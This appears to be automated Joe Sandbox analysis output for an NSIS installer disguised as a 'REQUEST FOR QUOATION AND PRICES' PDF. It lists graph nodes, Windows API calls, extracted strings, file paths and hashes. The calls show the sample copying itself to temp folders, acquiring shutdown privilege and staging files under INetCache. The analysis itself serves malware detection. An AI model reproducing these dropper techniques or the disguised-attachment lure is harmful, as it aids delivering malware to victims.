4188->4189 4190 405ee3 GlobalFree 4189->4190 4190->4179 4191->4170 4192->4176 4194 405bd0 lstrlenA 4193->4194 4195 405bd8 4194->4195 4196 405ba9 lstrcmpiA 4194->4196 4195->4184 4195->4185 4196->4195 4197 405bc7 CharNextA 4196->4197 4197->4194 5261 100010e1 5264 10001111 5261->5264 5262 100011d8 GlobalFree 5263 100012ba 2 API calls 5263->5264 5264->5262 5264->5263 5265 100011d3 5264->5265 5266 10001272 2 API calls 5264->5266 5267 10001164 GlobalAlloc 5264->5267 5268 100011f8 GlobalFree 5264->5268 5269 100011c4 GlobalFree 5264->5269 5270 100012e1 lstrcpyW 5264->5270 5265->5262 5266->5269 5267->5264 5268->5264 5269->5264 5270->5264 5271 401ca3 5272 402ba2 18 API calls 5271->5272 5273 401ca9 IsWindow 5272->5273 5274 401a05 5273->5274 5275 402a27 SendMessageW 5276 402a41 InvalidateRect 5275->5276 5277 402a4c 5275->5277 5276->5277 4565 405128 4566 405138 4565->4566 4567 40514c 4565->4567 4569 405195 4566->4569 4570 40513e 4566->4570 4568 405154 IsWindowVisible 4567->4568 4577 405174 4567->4577 4568->4569 4571 405161 4568->4571 4572 40519a CallWindowProcW 4569->4572 4573 404165 SendMessageW 4570->4573 4579 404a7e SendMessageW 4571->4579 4575 405148 4572->4575 4573->4575 4577->4572 4584 404afe 4577->4584 4580 404aa1 GetMessagePos ScreenToClient SendMessageW 4579->4580 4581 404add SendMessageW 4579->4581 4582 404ad5 4580->4582 4583 404ada 4580->4583 4581->4582 4582->4577 4583->4581 4593 406055 lstrcpynW 4584->4593 4586 404b11 4594 405f9c wsprintfW 4586->4594 4588 404b1b 4589 40140b 2 API calls 4588->4589 4590 404b24 4589->4590 4595 406055 lstrcpynW 4590->4595 4592 404b2b 4592->4569 4593->4586 4594->4588 4595->4592 4596 40242a 4607 402cc9 4596->4607 4598 402434 4599 402bbf 18 API calls 4598->4599 4600 40243d 4599->4600 4601 402448 RegQueryValueExW 4600->4601 4602 40281e 4600->4602 4603 402468 4601->4603 4606 40246e RegCloseKey 4601->4606 4603->4606 4611 405f9c wsprintfW 4603->4611 4606->4602 4608 402bbf 18 API calls 4607->4608 4609 402ce2 4608->4609 4610 402cf0 RegOpenKeyExW 
4609->4610 4610->4598 4611->4606 5278 40422d lstrcpynW lstrlenW 5279 40172d 5280 402bbf 18 API calls 5279->5280 5281 401734 SearchPathW 5280->5281 5282 40174f 5281->5282 4612 404b30 GetDlgItem GetDlgItem 4613 404b82 7 API calls 4612->4613 4616 404d9b 4612->4616 4614 404c25 DeleteObject 4613->4614 4615 404c18 SendMessageW 4613->4615 4617 404c2e 4614->4617 4615->4614 4622 404e60 4616->4622 4626 404e7f 4616->4626 4629 404dfb 4616->4629 4618 404c3d 4617->4618 4619 404c65 4617->4619 4621 406077 18 API calls 4618->4621 4623 404119 19 API calls 4619->4623 4620 404f2b 4627 404f35 SendMessageW 4620->4627 4634 404f3d 4620->4634 4628 404c47 SendMessageW SendMessageW 4621->4628 4622->4626 4633 404e71 SendMessageW 4622->4633 4624 404c79 4623->4624 4630 404119 19 API calls 4624->4630 4625 405113 4632 404180 8 API calls 4625->4632 4626->4620 4626->4625 4631 404ed8 SendMessageW 4626->4631 4627->4634 4628->4617 4635 404a7e 5 API calls 4629->4635 4648 404c87 4630->4648 4631->4625 4637 404eed SendMessageW 4631->4637 4638 405121 4632->4638 4633->4626 4639 404f56 4634->4639 4640 404f4f ImageList_Destroy 4634->4640 4644 404f66 4634->4644 4647 404e0c 4635->4647 4636 4050d5 4636->4625 4645 4050e7 ShowWindow GetDlgItem ShowWindow 4636->4645 4643 404f00 4637->4643 4641 404f5f GlobalFree 4639->4641 4639->4644 4640->4639 4641->4644 4642 404d5c GetWindowLongW SetWindowLongW 4646 404d75 4642->4646 4653 404f11 SendMessageW 4643->4653 4644->4636 4659 404afe 4 API calls 4644->4659 4662 404fa1 4644->4662 4645->4625 4649 404d93 4646->4649 4650 404d7b ShowWindow 4646->4650 4647->4622 4648->4642 4652 404cd7 SendMessageW 4648->4652 4654 404d56 4648->4654 4657 404d13 SendMessageW 4648->4657 4658 404d24 SendMessageW 4648->4658 4669 40414e SendMessageW 4649->4669 4668 40414e SendMessageW 4650->4668 4652->4648 4653->4620 4654->4642 4654->4646 4656 404d8e 4656->4625 4657->4648 4658->4648 4659->4662 4660 4050ab InvalidateRect 4660->4636 4661 4050c1 4660->4661 4670 404a39 4661->4670 4663 404fcf SendMessageW 
4662->4663 4664 404fe5 4662->4664 4663->4664 4664->4660 4665 405046 4664->4665 4667 405059 SendMessageW SendMessageW 4664->4667 4665->4667 4667->4664 4668->4656 4669->4616 4673 404970 4670->4673 4672 404a4e 4672->4636 4674 404989 4673->4674 4675 406077 18 API calls 4674->4675 4676 4049ed 4675->4676 4677 406077 18 API calls 4676->4677 4678 4049f8 4677->4678 4679 406077 18 API calls 4678->4679 4680 404a0e lstrlenW wsprintfW SetDlgItemTextW 4679->4680 4680->4672 5283 4045b4 5284 4045e0 5283->5284 5285 4045f1 5283->5285 5344 40577e GetDlgItemTextW 5284->5344 5287 4045fd GetDlgItem 5285->5287 5288 40465c 5285->5288 5291 404611 5287->5291 5289 404740 5288->5289 5298 406077 18 API calls 5288->5298 5342 4048ef 5288->5342 5289->5342 5346 40577e GetDlgItemTextW 5289->5346 5290 4045eb 5292 4062e9 5 API calls 5290->5292 5293 404625 SetWindowTextW 5291->5293 5296 405ab4 4 API calls 5291->5296 5292->5285 5297 404119 19 API calls 5293->5297 5295 404180 8 API calls 5300 404903 5295->5300 5301 40461b 5296->5301 5302 404641 5297->5302 5303 4046d0 SHBrowseForFolderW 5298->5303 5299 404770 5304 405b11 18 API calls 5299->5304 5301->5293 5308 405a09 3 API calls 5301->5308 5305 404119 19 API calls 5302->5305 5303->5289 5306 4046e8 CoTaskMemFree 5303->5306 5307 404776 5304->5307 5309 40464f 5305->5309 5310 405a09 3 API calls 5306->5310 5347 406055 lstrcpynW 5307->5347 5308->5293 5345 40414e SendMessageW 5309->5345 5317 4046f5 5310->5317 5313 404655 5316 40642b 5 API calls 5313->5316 5314 40472c SetDlgItemTextW 5314->5289 5315 40478d 5318 40642b 5 API calls 5315->5318 5316->5288 5317->5314 5319 406077 18 API calls 5317->5319 5325 404794 5318->5325 5321 404714 lstrcmpiW 5319->5321 5320 4047d5 5348 406055 lstrcpynW 5320->5348 5321->5314 5322 404725 lstrcatW 5321->5322 5322->5314 5324 4047dc 5326 405ab4 4 API calls 5324->5326 5325->5320 5330 405a55 2 API calls 5325->5330 5331 40482d 5325->5331 5327 4047e2 GetDiskFreeSpaceW 5326->5327 5329 404806 MulDiv 5327->5329 5327->5331 5329->5331 
5330->5325 5332 40489e 5331->5332 5334 404a39 21 API calls 5331->5334 5333 4048c1 5332->5333 5335 40140b 2 API calls 5332->5335 5349 40413b EnableWindow 5333->5349 5336 40488b 5334->5336 5335->5333 5338 4048a0 SetDlgItemTextW 5336->5338 5339 404890 5336->5339 5338->5332 5341 404970 21 API calls 5339->5341 5340 4048dd 5340->5342 5350 404549 5340->5350 5341->5332 5342->5295 5344->5290 5345->5313 5346->5299 5347->5315 5348->5324 5349->5340 5351 404557 5350->5351 5352 40455c SendMessageW 5350->5352 5351->5352 5352->5342 5353 4027b4 5354 4027ba 5353->5354 5355 4027c2 FindClose 5354->5355 5356 402a4c 5354->5356 5355->5356 5357 4042b6 5358 4042ce 5357->5358 5362 4043e8 5357->5362 5363 404119 19 API calls 5358->5363 5359 404452 5360 404524 5359->5360 5361 40445c GetDlgItem 5359->5361 5368 404180 8 API calls 5360->5368 5364 4044e5 5361->5364 5365 404476 5361->5365 5362->5359 5362->5360 5366 404423 GetDlgItem SendMessageW 5362->5366 5367 404335 5363->5367 5364->5360 5373 4044f7 5364->5373 5365->5364 5372 40449c 6 API calls 5365->5372 5388 40413b EnableWindow 5366->5388 5370 404119 19 API calls 5367->5370 5371 40451f 5368->5371 5375 404342 CheckDlgButton 5370->5375 5372->5364 5376 40450d 5373->5376 5377 4044fd SendMessageW 5373->5377 5374 40444d 5379 404549 SendMessageW 5374->5379 5386 40413b EnableWindow 5375->5386 5376->5371 5378 404513 SendMessageW 5376->5378 5377->5376 5378->5371 5379->5359 5381 404360 GetDlgItem 5387 40414e SendMessageW 5381->5387 5383 404376 SendMessageW 5384 404393 GetSysColor 5383->5384 5385 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5383->5385 5384->5385 5385->5371 5386->5381 5387->5383 5388->5374 5389 401b37 5390 401b88 5389->5390 5392 401b44 5389->5392 5393 401bb2 GlobalAlloc 5390->5393 5394 401b8d 5390->5394 5391 401bcd 5395 406077 18 API calls 5391->5395 5404 402288 5391->5404 5392->5391 5397 401b5b 5392->5397 5396 406077 18 API calls 5393->5396 5394->5404 5410 406055 lstrcpynW 5394->5410 5399 402282 5395->5399 5396->5391 
5408 406055 lstrcpynW 5397->5408 5402 40579a MessageBoxIndirectW 5399->5402 5401 401b9f GlobalFree 5401->5404 5402->5404 5403 401b6a 5409 406055 lstrcpynW 5403->5409 5406 401b79 5411 406055 lstrcpynW 5406->5411 5408->5403 5409->5406 5410->5401 5411->5404 5412 402537 5413 402562 5412->5413 5414 40254b 5412->5414 5416 402596 5413->5416 5417 402567 5413->5417 5415 402ba2 18 API calls 5414->5415 5424 402552 5415->5424 5419 402bbf 18 API calls 5416->5419 5418 402bbf 18 API calls 5417->5418 5421 40256e WideCharToMultiByte lstrlenA 5418->5421 5420 40259d lstrlenW 5419->5420 5420->5424 5421->5424 5422 4025ca 5423 4025e0 5422->5423 5425 405cdc WriteFile 5422->5425 5424->5422 5424->5423 5426 405d0b 5 API calls 5424->5426 5425->5423 5426->5422 5427 4014b8 5428 4014be 5427->5428 5429 401389 2 API calls 5428->5429 5430 4014c6 5429->5430 4709 4015b9 4710 402bbf 18 API calls 4709->4710 4711 4015c0 4710->4711 4712 405ab4 4 API calls 4711->4712 4724 4015c9 4712->4724 4713 401629 4715 40165b 4713->4715 4716 40162e 4713->4716 4714 405a36 CharNextW 4714->4724 4719 401423 25 API calls 4715->4719 4717 401423 25 API calls 4716->4717 4718 401635 4717->4718 4728 406055 lstrcpynW 4718->4728 4726 401653 4719->4726 4721 405700 2 API calls 4721->4724 4722 40571d 5 API calls 4722->4724 4723 401642 SetCurrentDirectoryW 4723->4726 4724->4713 4724->4714 4724->4721 4724->4722 4725 40160f GetFileAttributesW 4724->4725 4727 405683 4 API calls 4724->4727 4725->4724 4727->4724 4728->4723 5431 10002a7f 5432 10002a97 5431->5432 5433 1000158f 2 API calls 5432->5433 5434 10002ab2 5433->5434

APIs
• SetErrorMode.KERNELBASE ref: 004032C2
• GetVersion.KERNEL32 ref: 004032C8
• #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
• OleInitialize.OLE32(00000000), ref: 0040331F
• SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
• GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000), ref: 00403363
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000020), ref: 0040338A
  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
• DeleteFileW.KERNELBASE(1033), ref: 0040352B
  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
• OleUninitialize.OLE32(?), ref: 004035F6
• ExitProcess.KERNEL32 ref: 00403618
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 0040362B
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 0040363A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 00403645
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000,?), ref: 00403651
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
• DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
• CopyFileW.KERNEL32(C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,0042AA28,00000001), ref: 004036DB
• CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
• OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3586999533-2829748640
                                                                                                                                  • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                  • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                  • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                  • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                  • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                  • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                  • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4227406936-0
                                                                                                                                  • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                  • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                  • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                  • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 900638850-1230650788

                                                                                                                                  Control-flow Graph: entry block 405846-40586c (legend: Executed / Not Executed)
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 0040586F
                                                                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058B7
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058DA
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058E0
                                                                                                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004058F0
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                  Strings
                                                                                                                                  • \*.*, xrefs: 004058B1
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                                  • "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe", xrefs: 0040584F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                  • API String ID: 2035342205-2172775768
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00402154
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                  • API String ID: 542301482-2989991106
                                                                                                                                  APIs
